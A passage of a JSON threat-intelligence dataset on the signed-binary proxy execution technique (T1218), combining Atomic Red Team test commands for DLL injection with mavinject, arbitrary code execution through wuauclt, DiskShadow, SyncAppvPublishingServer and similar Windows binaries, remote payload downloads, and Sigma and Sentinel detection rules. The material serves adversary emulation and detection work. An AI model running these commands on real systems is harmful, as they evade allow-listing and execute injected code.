-ModulePath $PWD", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "#{dspath} -S PathToAtomicsFolder\\T1218\\src\\T1218.txt \n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "C:\\Windows\\System32\\diskshadow.exe -S #{txt_payload} \n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "wuauclt.exe /UpdateDeploymentProvider PathToAtomicsFolder\\T1218\\bin\\calc.dll /RunHandlerComServer\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "Gpscript /logon\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "Gpscript /startup\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "copy #{Path_ie4uinit} %TEMP%\\ie4uinit.exe\ncopy PathToAtomicsFolder\\T1218\\src\\ieuinit.inf %TEMP%\\ieuinit.inf\n%TEMP%\\ie4uinit.exe -BaseSettings\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "copy c:\\windows\\system32\\ie4uinit.exe %TEMP%\\ie4uinit.exe\ncopy #{Path_inf} %TEMP%\\ieuinit.inf\n%TEMP%\\ie4uinit.exe -BaseSettings\n", + "source": "atomics/T1218/T1218.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution" + }, + { + "command": "mavinject.exe|SyncAppvPublishingServer.exe", + "source": "SysmonHunter - Signed Binary Proxy Execution", + "name": "" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1218", + "display_name": "Signed Binary Proxy Execution", + "atomic_tests": [ + { + "name": "mavinject - Inject DLL into running process", + "auto_generated_guid": "c426dacf-575d-4937-8611-a148a86a5e61", + "description": "Injects arbitrary DLL into running process specified by process ID. Requires Windows 10.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "process_id": { + "description": "PID of process receiving injection", + "type": "String", + "default": "1000" + }, + "dll_payload": { + "description": "DLL to inject", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218\\src\\x64\\T1218.dll" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "T1218.dll must exist on disk at specified location (#{dll_payload})\n", + "prereq_command": "if (Test-Path #{dll_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/x64/T1218.dll\" -OutFile \"#{dll_payload}\"\n" + } + ], + "executor": { + "command": "mavinject.exe #{process_id} /INJECTRUNNING #{dll_payload}\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "SyncAppvPublishingServer - Execute arbitrary PowerShell code", + "auto_generated_guid": "d590097e-d402-44e2-ad72-2c6aa1ce78b1", + "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "powershell_code": { + "description": "PowerShell code to execute", + "type": "String", + "default": "Start-Process calc.exe" + } + }, + "executor": { + "command": "SyncAppvPublishingServer.exe \"n; #{powershell_code}\"\n", + "name": "command_prompt" + } + }, + { + "name": "Register-CimProvider - Execute evil dll", + "auto_generated_guid": "ad2c17ed-f626-4061-b21e-b9804a6f3655", + "description": "Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "dll_payload": { + "description": "DLL to execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218\\src\\Win32\\T1218-2.dll" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "T1218-2.dll must exist on disk at specified location (#{dll_payload})\n", + "prereq_command": "if (Test-Path #{dll_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{dll_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Win32/T1218-2.dll\" -OutFile \"#{dll_payload}\"\n" + } + ], + "executor": { + "command": "C:\\Windows\\SysWow64\\Register-CimProvider.exe -Path #{dll_payload}\n", + "name": "command_prompt" + } + }, + { + "name": "InfDefaultInstall.exe .inf Execution", + "auto_generated_guid": "54ad7d5a-a1b5-472c-b6c4-f8090fb2daef", + "description": "Test execution of a .inf using InfDefaultInstall.exe\n\nReference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "inf_to_execute": { + "description": "Local location of inf file", + "type": "String", + "default": "PathToAtomicsFolder\\T1218\\src\\Infdefaultinstall.inf" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "INF file must exist on disk at specified location (#{inf_to_execute})\n", + "prereq_command": "if (Test-Path #{inf_to_execute}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{inf_to_execute}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/Infdefaultinstall.inf\" -OutFile \"#{inf_to_execute}\"\n" + } + ], + "executor": { + "command": "InfDefaultInstall.exe #{inf_to_execute}\n", + "name": "command_prompt" + } + }, + { + "name": "ProtocolHandler.exe Downloaded a Suspicious File", + "auto_generated_guid": "db020456-125b-4c8b-a4a7-487df8afb5a2", + "description": "Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "remote_url": { + "description": "url to document", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218/src/T1218Test.docx" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Microsoft Word must be installed with the correct path and protocolhandler.exe must be provided\n", + "prereq_command": "if (Test-Path \"(Resolve-Path \"C:\\Program Files*\\Microsoft Office\\root\\Office16\")\\protocolhandler.exe\") {exit 0} else {exit 1}\n", + "get_prereq_command": "write-host \"Install Microsoft Word or provide correct path.\"\n" + } + ], + "executor": { + "name": "command_prompt", + "elevation_required": false, + "command": "FOR /F \"tokens=2*\" %a in ('reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\Winword.exe\" /V PATH') do set microsoft_wordpath=%b\ncall \"%microsoft_wordpath%\\protocolhandler.exe\" \"ms-word:nft|u|#{remote_url}\"\n" + } + }, + { + "name": "Microsoft.Workflow.Compiler.exe Payload Execution", + "auto_generated_guid": "7cbb0f26-a4c1-4f77-b180-a009aa05637e", + "description": "Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "xml_payload": { + "description": "XML to execution", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218\\src\\T1218.xml" + }, + "mwcpath": { + "description": "Default location of Microsoft.Workflow.Compiler.exe", + "type": "Path", + "default": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319" + }, + "mwcname": { + "description": "Default name of microsoft.workflow.compiler.exe", + "type": "Path", + "default": "microsoft.workflow.compiler.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": ".Net must be installed for this test to work correctly.\n", + "prereq_command": "if (Test-Path #{mwcpath}\\#{mwcname} ) {exit 0} else {exit 1}\n", + "get_prereq_command": "write-host \".Net must be installed for this test to work correctly.\"\n" + } + ], + "executor": { + "command": "#{mwcpath}\\#{mwcname} \"#{xml_payload}\" output.txt\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Renamed Microsoft.Workflow.Compiler.exe Payload Executions", + "auto_generated_guid": "4cc40fd7-87b8-4b16-b2d7-57534b86b911", + "description": "Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "xml_payload": { + "description": "XML to execution", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218\\src\\T1218.xml" + }, + "renamed_binary": { + "description": "renamed Microsoft.Workflow.Compiler", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218\\src\\svchost.exe" + }, + "mwcpath": { + "description": "Default location of Microsoft.Workflow.Compiler.exe", + "type": "Path", + "default": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319" + }, + "mwcname": { + "description": "Default name of microsoft.workflow.compiler.exe", + "type": "Path", + "default": "microsoft.workflow.compiler.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": ".Net must be installed for this test to work correctly.\n", + "prereq_command": "Copy-Item #{mwcpath}\\#{mwcname} \"#{renamed_binary}\" -Force\nif (Test-Path \"#{renamed_binary}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "write-host \"you need to rename workflow complier before you run this test\"\n" + } + ], + "executor": { + "command": "#{renamed_binary} #{xml_payload} output.txt\n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Invoke-ATHRemoteFXvGPUDisablementCommand base test", + "auto_generated_guid": "9ebe7901-7edf-45c0-b5c7-8366300919db", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).\n\nOne of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as \"PowerShell module load-order hijacking\" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted.\n\nInvoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how a PowerShell host executable can be directed to user-supplied PowerShell code without needing to supply anything at the command-line. PowerShell code execution is triggered when supplying the \"Disable\" argument to RemoteFXvGPUDisablement.exe.\n\nThe Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts.\n\nReference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "module_name": { + "description": "Specifies a temporary module name to use. If -ModuleName is not supplied, a 16-character random temporary module name is used. A PowerShell module can have any name. Because Get-VMRemoteFXPhysicalVideoAdapter abuses module load order, a module name must be specified.", + "type": "String", + "default": "foo" + }, + "module_path": { + "description": "Specifies an alternate, non-default PowerShell module path for RemoteFXvGPUDisablement.exe. If -ModulePath is not specified, the first entry in %PSModulePath% will be used. Typically, this is %USERPROFILE%\\Documents\\WindowsPowerShell\\Modules.", + "type": "String", + "default": "$PWD" + } + }, + "dependencies": [ + { + "description": "The AtomicTestHarnesses module must be installed and Invoke-ATHRemoteFXvGPUDisablementCommand must be exported in the module.", + "prereq_command": "$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Invoke-ATHRemoteFXvGPUDisablementCommand']) {exit 1} else {exit 0}", + "get_prereq_command": "Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}", + "name": "powershell" + } + }, + { + "name": "DiskShadow Command Execution", + "auto_generated_guid": "0e1483ba-8f0c-425d-b8c6-42736e058eaa", + "description": "Emulates attack with a DiskShadow.exe (LOLBIN installed by default on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "txt_payload": { + "description": "txt to execute", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218\\src\\T1218.txt" + }, + "dspath": { + "description": "Default location of DiskShadow.exe", + "type": "Path", + "default": "C:\\Windows\\System32\\diskshadow.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "txt file must exist on disk at specified location (#{txt_payload})", + "prereq_command": "if (Test-Path #{txt_payload}) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{txt_payload}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt\" -OutFile \"#{txt_payload}\"\n" + }, + { + "description": "DiskShadow.exe must exist on disk at specified location (#{dspath})", + "prereq_command": "if (Test-Path #{dspath}) {exit 0} else {exit 1}\n", + "get_prereq_command": "echo \"DiskShadow.exe not found on disk at expected location\"\n" + } + ], + "executor": { + "command": "#{dspath} -S #{txt_payload} \n", + "name": "powershell", + "elevation_required": false + } + }, + { + "name": "Load Arbitrary DLL via Wuauclt (Windows Update Client)", + "auto_generated_guid": "49fbd548-49e9-4bb7-94a6-3769613912b8", + "description": "This test uses Wuauclt to load an arbitrary DLL. Upon execution with the default inputs, calculator.exe will be launched. \nSee https://dtm.uk/wuauclt/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "arbitrary_dll": { + "description": "Path of DLL to be loaded", + "type": "String", + "default": "PathToAtomicsFolder\\T1218\\bin\\calc.dll" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "DLL to load must exist on disk as specified location (#{arbitrary_dll})\n", + "prereq_command": "if (test-path \"#{arbitrary_dll}\"){exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{arbitrary_dll}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/bin/calc.dll?raw=true\" -OutFile \"#{arbitrary_dll}\"\n" + } + ], + "executor": { + "command": "wuauclt.exe /UpdateDeploymentProvider #{arbitrary_dll} /RunHandlerComServer\n", + "cleanup_command": "taskkill /f /im calculator.exe > nul 2>&1", + "name": "command_prompt" + } + }, + { + "name": "Lolbin Gpscript logon option", + "auto_generated_guid": "5bcda9cd-8e85-48fa-861d-b5a85d91d48c", + "description": "Executes logon scripts configured in Group Policy.\nhttps://lolbas-project.github.io/lolbas/Binaries/Gpscript/\nhttps://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Gpscript /logon\n", + "name": "command_prompt" + } + }, + { + "name": "Lolbin Gpscript startup option", + "auto_generated_guid": "f8da74bb-21b8-4af9-8d84-f2c8e4a220e3", + "description": "Executes startup scripts configured in Group Policy\nhttps://lolbas-project.github.io/lolbas/Binaries/Gpscript/\nhttps://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Gpscript /startup\n", + "name": "command_prompt" + } + }, + { + "name": "Lolbas ie4uinit.exe use as proxy", + "auto_generated_guid": "13c0804e-615e-43ad-b223-2dfbacd0b0b3", + "description": "Executes commands from a specially prepared ie4uinit.inf file.\nPoc from : https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/\nReference: https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "Path_inf": { + "description": "Path to the cab file", + "type": "Path", + "default": "PathToAtomicsFolder\\T1218\\src\\ieuinit.inf" + }, + "Path_ie4uinit": { + "description": "Path to ie4uinit.exe", + "type": "Path", + "default": "c:\\windows\\system32\\ie4uinit.exe" + } + }, + "executor": { + "command": "copy #{Path_ie4uinit} %TEMP%\\ie4uinit.exe\ncopy #{Path_inf} %TEMP%\\ieuinit.inf\n%TEMP%\\ie4uinit.exe -BaseSettings\n", + "cleanup_command": "del %TEMP%\\ie4uinit.exe >nul 2>&1\ndel %TEMP%\\ieuinit.inf >nul 2>&1\n", + "name": "command_prompt" + } + } + ] + }, + { + "name": "Signed Binary Proxy Execution", + "description": null, + "level": "medium", + "phase": "Execution", + "query": [ + { + "type": "process", + "process": { + "any": { + "pattern": "mavinject.exe|SyncAppvPublishingServer.exe" + } + } + } + ] + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 3and (process_path contains \"certutil.exe\"or process_command_line contains \"*certutil*script\\\\:http\\\\[\\\\:\\\\]\\\\/\\\\/*\"or process_path contains \"*\\\\replace.exe\")", + "name": "Signed Binary Proxy Execution Network" + }, + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1and (process_command_line contains \"mavinject*\\\\/injectrunning\"or process_command_line contains \"mavinject32*\\\\/injectrunning*\"or process_command_line contains \"*certutil*script\\\\:http\\\\[\\\\:\\\\]\\\\/\\\\/*\"or process_command_line contains \"*certutil*script\\\\:https\\\\[\\\\:\\\\]\\\\/\\\\/*\"or process_command_line contains \"*msiexec*http\\\\[\\\\:\\\\]\\\\/\\\\/*\"or process_command_line contains \"*msiexec*https\\\\[\\\\:\\\\]\\\\/\\\\/*\")", + "name": "Signed Binary Proxy Execution Process" + } + ], + "possible_detections": [ + { + "title": "MavInject Process Injection", + "id": "17eb8e57-9983-420d-ad8a-2c4976c22eb8", + "status": "experimental", + "description": "Detects process injection using the signed Windows tool Mavinject32.exe", + "references": [ + "https://twitter.com/gN3mes1s/status/941315826107510784", + "https://reaqta.com/2017/12/mavinject-microsoft-injector/", + "https://twitter.com/Hexacorn/status/776122138063409152" + ], + "author": "Florian Roth", + "date": "2018/12/12", + "tags": [ + "attack.t1055", + "attack.t1218" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "CommandLine": "* /INJECTRUNNING *" + }, + "condition": "selection" + }, + "falsepositives": [ + "unknown" + ], + "level": "critical" + }, + { + "title": "Application whitelisting bypass via bginfo", + "id": "aaf46cdc-934e-4284-b329-34aa701e3771", + "status": "experimental", + "description": "Execute VBscript code that is referenced within the *.bgi file.", + "references": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Bginfo.yml", + "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/" + ], + "author": "Beyu Denis, oscd.community", + "date": "2019/10/26", + "modified": "2019/11/04", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "level": "medium", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image|endswith": "\\bginfo.exe", + "CommandLine|contains|all": [ + "/popup", + "/nolicprompt" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ] + }, + { + "title": "Possible Application Whitelisting Bypass via WinDbg/CDB as a shellcode runner", + "id": "b5c7395f-e501-4a08-94d4-57fe7a9da9d2", + "status": "experimental", + "description": "Launch 64-bit shellcode from the x64_calc.wds file using cdb.exe.", + "references": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Cdb.yml", + "http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html" + ], + "author": "Beyu Denis, oscd.community", + "date": "2019/10/26", + "modified": "2019/11/04", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "level": "medium", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image|endswith": "\\cdb.exe", + "CommandLine|contains": "-cf" + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate use of debugging tools" + ] + }, + { + "title": "Devtoolslauncher.exe executes specified binary", + "id": "cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6", + "status": "experimental", + "description": "The Devtoolslauncher.exe executes other binary", + "references": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Devtoolslauncher.yml", + "https://twitter.com/_felamos/status/1179811992841797632" + ], + "author": "Beyu Denis, oscd.community (rule), @_felamos (idea)", + "date": "2019/10/12", + "modified": "2019/11/04", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "level": "critical", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image|endswith": "\\devtoolslauncher.exe", + "CommandLine|contains": "LaunchForDeploy" + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate use of devtoolslauncher.exe by legitimate user" + ] + }, + { + "title": "Application Whitelisting bypass via dnx.exe", + "id": "81ebd28b-9607-4478-bf06-974ed9d53ed7", + "status": "experimental", + "description": "Execute C# code located in the consoleapp folder", + "references": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Csi.yml", + "https://enigma0x3.net/2016/11/17/bypassing-application-whitelisting-by-using-dnx-exe/" + ], + "author": "Beyu Denis, oscd.community", + "date": "2019/10/26", + "modified": "2019/11/04", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "level": "medium", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image|endswith": "\\dnx.exe" + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate use of dnx.exe by legitimate user" + ] + }, + { + "title": "Application Whitelisting bypass via dxcap.exe", + "id": "60f16a96-db70-42eb-8f76-16763e333590", + "status": "experimental", + "description": "Detects execution of of Dxcap.exe", + "references": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OtherMSBinaries/Dxcap.yml", + "https://twitter.com/harr0ey/status/992008180904419328" + ], + "author": "Beyu Denis, oscd.community", + "date": "2019/10/26", + "modified": "2019/11/04", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "level": "medium", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image|endswith": "\\dxcap.exe", + "CommandLine|contains|all": [ + "-c", + ".exe" + ] + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate execution of dxcap.exe by legitimate user" + ] + }, + { + "title": "Possible Application Whitelisting Bypass via dll loaded by odbcconf.exe", + "id": "65d2be45-8600-4042-b4c0-577a1ff8a60e", + "description": "Detects defence evasion attempt via odbcconf.exe execution to load DLL", + "status": "experimental", + "references": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Odbcconf.yml", + "https://twitter.com/Hexacorn/status/1187143326673330176" + ], + "author": "Kirill Kiryanov, Beyu Denis, Daniil Yugoslavskiy, oscd.community", + "date": "2019/10/25", + "modified": "2019/11/07", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection_1": { + "Image|endswith": "\\odbcconf.exe", + "CommandLine|contains": [ + "-f", + "regsvr" + ] + }, + "selection_2": { + "ParentImage|endswith": "\\odbcconf.exe", + "Image|endswith": "\\rundll32.exe" + }, + "condition": "selection_1 or selection_2" + }, + "level": "medium", + "falsepositives": [ + "Legitimate use of odbcconf.exe by legitimate user" + ] + }, + { + "title": "OpenWith.exe executes specified binary", + "id": "cec8e918-30f7-4e2d-9bfa-a59cc97ae60f", + "status": "experimental", + "description": "The OpenWith.exe executes other binary", + "references": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/LOLUtilz/OSBinaries/Openwith.yml", + "https://twitter.com/harr0ey/status/991670870384021504" + ], + "author": "Beyu Denis, oscd.community (rule), @harr0ey (idea)", + "date": "2019/10/12", + "modified": "2019/11/04", + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1218" + ], + "level": "high", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image|endswith": "\\OpenWith.exe", + "CommandLine|contains": "/c" + }, + "condition": "selection" + }, + "falsepositives": [ + "Legitimate use of OpenWith.exe by legitimate user" + ] + }, + { + "title": "psr.exe capture screenshots", + "id": "2158f96f-43c2-43cb-952a-ab4580f32382", + "status": "experimental", + "description": "The psr.exe captures desktop screenshots and saves them on the local machine", + "references": [ + "https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/LOLUtilz/OSBinaries/Psr.yml", + "https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf" + ], + "author": "Beyu Denis, oscd.community", + "date": "2019/10/12", + "modified": "2019/11/04", + "tags": [ + "attack.persistence", + "attack.t1218" + ], + "level": "medium", + "logsource": { + "category": "process_creation", + "product": "windows" + }, + "detection": { + "selection": { + "Image|endswith": "\\Psr.exe", + "CommandLine|contains": "/start" + }, + "condition": "selection" + }, + "falsepositives": [ + "Unknown" + ] + }, + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + 